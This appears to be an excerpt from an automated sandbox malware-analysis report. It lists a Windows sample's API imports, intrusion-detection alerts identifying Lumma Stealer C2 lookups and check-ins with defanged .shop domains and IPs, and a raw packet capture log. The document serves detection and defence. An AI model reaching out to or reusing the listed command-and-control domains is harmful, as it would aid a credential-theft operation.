DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | WidenPath, UnrealizeObject, TextOutW, StrokePath, StrokeAndFillPath, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixel, SetGraphicsMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetArcDirection, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SelectClipPath, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, PtVisible, PolylineTo, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PathToRegion, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetTextColor, GetTextCharacterExtra, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, FrameRgn, FillPath, ExtTextOutW, ExtSelectClipRgn, ExtFloodFill, ExtCreateRegion, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRoundRectRgn, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateEllipticRgnIndirect, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, CloseFigure, Chord, BitBlt, BeginPath, ArcTo, Arc, AngleArc, AbortDoc
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll | WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, RaiseException, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTickCount, GetThreadPriority, GetThreadLocale, GetSystemInfo, GetSystemTimes, GetStdHandle, GetProcAddress, GetPrivateProfileStringW, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringW, CloseHandle, Beep
advapi32.dll | RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
oleaut32.dll | GetErrorInfo, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
user32.dll | EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll | memset, memcpy
shell32.dll | Shell_NotifyIconW
winspool.drv | OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv | GetDefaultPrinterW
winmm.dll | timeGetTime
Name | Ordinal | Address
TMethodImplementationIntercept | 1 | 0x461524
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T21:26:16.070452+0200 | 2056162 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) | 1 | 192.168.2.4 | 54940 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:16.584078+0200 | 2056163 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) | 1 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:17.076987+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:17.076987+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:17.088211+0200 | 2056164 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) | 1 | 192.168.2.4 | 53409 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:17.624090+0200 | 2056165 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) | 1 | 192.168.2.4 | 49736 | 104.21.4.136 | 443 | TCP
2024-09-26T21:26:18.061879+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49736 | 104.21.4.136 | 443 | TCP
2024-09-26T21:26:18.061879+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 104.21.4.136 | 443 | TCP
2024-09-26T21:26:18.561343+0200 | 2056163 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) | 1 | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:18.985344+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:18.985344+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:18.999445+0200 | 2056160 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) | 1 | 192.168.2.4 | 61718 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:19.520948+0200 | 2056161 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) | 1 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:19.968358+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:19.968358+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:20.003264+0200 | 2056158 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) | 1 | 192.168.2.4 | 54999 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:20.494914+0200 | 2056159 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) | 1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP
2024-09-26T21:26:20.986518+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP
2024-09-26T21:26:20.986518+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP
2024-09-26T21:26:21.498032+0200 | 2056156 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) | 1 | 192.168.2.4 | 60290 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:21.992400+0200 | 2056157 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) | 1 | 192.168.2.4 | 49741 | 172.67.162.108 | 443 | TCP
2024-09-26T21:26:22.456694+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49741 | 172.67.162.108 | 443 | TCP
2024-09-26T21:26:22.456694+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49741 | 172.67.162.108 | 443 | TCP
2024-09-26T21:26:22.460224+0200 | 2056154 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) | 1 | 192.168.2.4 | 53798 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:22.980219+0200 | 2056155 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) | 1 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:23.482099+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:23.482099+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | TCP
2024-09-26T21:26:23.625768+0200 | 2056152 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) | 1 | 192.168.2.4 | 52289 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:24.184473+0200 | 2056153 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) | 1 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP
2024-09-26T21:26:24.736633+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP
2024-09-26T21:26:24.736633+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP
2024-09-26T21:26:24.738372+0200 | 2056150 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) | 1 | 192.168.2.4 | 52359 | 1.1.1.1 | 53 | UDP
2024-09-26T21:26:25.242032+0200 | 2056151 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) | 1 | 192.168.2.4 | 49744 | 172.67.208.139 | 443 | TCP
2024-09-26T21:26:25.664023+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49744 | 172.67.208.139 | 443 | TCP
2024-09-26T21:26:25.664023+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49744 | 172.67.208.139 | 443 | TCP
2024-09-26T21:26:28.033341+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49746 | 172.67.128.144 | 443 | TCP
2024-09-26T21:26:28.033341+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49746 | 172.67.128.144 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 21:26:16.108561039 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.108609915 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:16.108690977 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.113039970 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.113059998 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:16.584002972 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:16.584078074 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.587587118 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.587605000 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:16.588032961 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:16.642267942 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.642337084 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:16.642487049 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:17.077060938 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:17.077286005 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:17.077380896 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:17.079391956 CEST | 49734 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:17.079426050 CEST | 443 | 49734 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:17.107861042 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.107901096 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:17.107994080 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.108330011 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.108340979 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:17.623980045 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:17.624089956 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.630017996 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.630033970 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:17.630435944 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:17.637546062 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.637727022 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:17.637793064 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:18.061585903 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:18.061791897 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:18.061897993 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:18.062787056 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:18.062787056 CEST | 49736 | 443 | 192.168.2.4 | 104.21.4.136
Sep 26, 2024 21:26:18.062803030 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:18.062809944 CEST | 443 | 49736 | 104.21.4.136 | 192.168.2.4
Sep 26, 2024 21:26:18.083444118 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.083467960 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.083585024 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.092777014 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.092787027 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.561261892 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.561342955 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.562421083 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.562444925 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.562812090 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.569822073 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.569840908 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.569997072 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.985371113 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.985518932 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.985586882 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.985790014 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.985809088 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:18.985817909 CEST | 49738 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:18.985824108 CEST | 443 | 49738 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.027756929 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.027841091 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.027935028 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.028254986 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.028275967 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.520780087 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.520947933 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.538970947 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.539071083 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.539505959 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.550236940 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.550292015 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.550369978 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.968388081 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.968512058 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:19.968600988 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.968741894 CEST | 49739 | 443 | 192.168.2.4 | 188.114.97.3
Sep 26, 2024 21:26:19.968782902 CEST | 443 | 49739 | 188.114.97.3 | 192.168.2.4
Sep 26, 2024 21:26:20.025494099 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.025531054 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.025599957 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.025963068 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.025979042 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.494852066 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.494914055 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.496798992 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.496810913 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.497142076 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.498338938 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.498370886 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:20.498419046 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.986597061 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.986772060 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:20.986818075 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:21.323574066 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:21.323604107 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:21.323621988 CEST | 49740 | 443 | 192.168.2.4 | 188.114.96.3
Sep 26, 2024 21:26:21.323630095 CEST | 443 | 49740 | 188.114.96.3 | 192.168.2.4
Sep 26, 2024 21:26:21.514677048 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.514786005 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:21.514889002 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.515316963 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.515357018 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:21.992304087 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:21.992399931 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.994525909 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.994544983 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:21.994885921 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:21.996669054 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.996714115 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:21.996761084 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:22.456778049 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:22.457015991 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:22.457099915 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:22.457307100 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:22.457364082 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:22.457396030 CEST | 49741 | 443 | 192.168.2.4 | 172.67.162.108
Sep 26, 2024 21:26:22.457412004 CEST | 443 | 49741 | 172.67.162.108 | 192.168.2.4
Sep 26, 2024 21:26:22.475730896 CEST | 49742 | 443 | 192.168.2.4 | 188.114.97.3
                                                                        Sep 26, 2024 21:26:22.475816965 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.475908995 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.476278067 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.476314068 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.980078936 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.980218887 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.989341974 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.989370108 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.989790916 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:22.992459059 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.992496967 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:22.992558956 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482184887 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482472897 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482647896 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:23.482803106 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:23.482846975 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.482877970 CEST49742443192.168.2.4188.114.97.3
                                                                        Sep 26, 2024 21:26:23.482894897 CEST44349742188.114.97.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.672992945 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:23.673039913 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:23.673124075 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:23.673470974 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:23.673484087 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.184247971 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.184473038 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.328013897 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.328030109 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.329027891 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.335340977 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.335397005 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.335519075 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736649036 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736766100 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736807108 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.736903906 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.736921072 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.736931086 CEST49743443192.168.2.4188.114.96.3
                                                                        Sep 26, 2024 21:26:24.736936092 CEST44349743188.114.96.3192.168.2.4
                                                                        Sep 26, 2024 21:26:24.755954027 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:24.756089926 CEST44349744172.67.208.139192.168.2.4
                                                                        Sep 26, 2024 21:26:24.756170034 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:24.756663084 CEST49744443192.168.2.4172.67.208.139
                                                                        Sep 26, 2024 21:26:24.756704092 CEST44349744172.67.208.139192.168.2.4
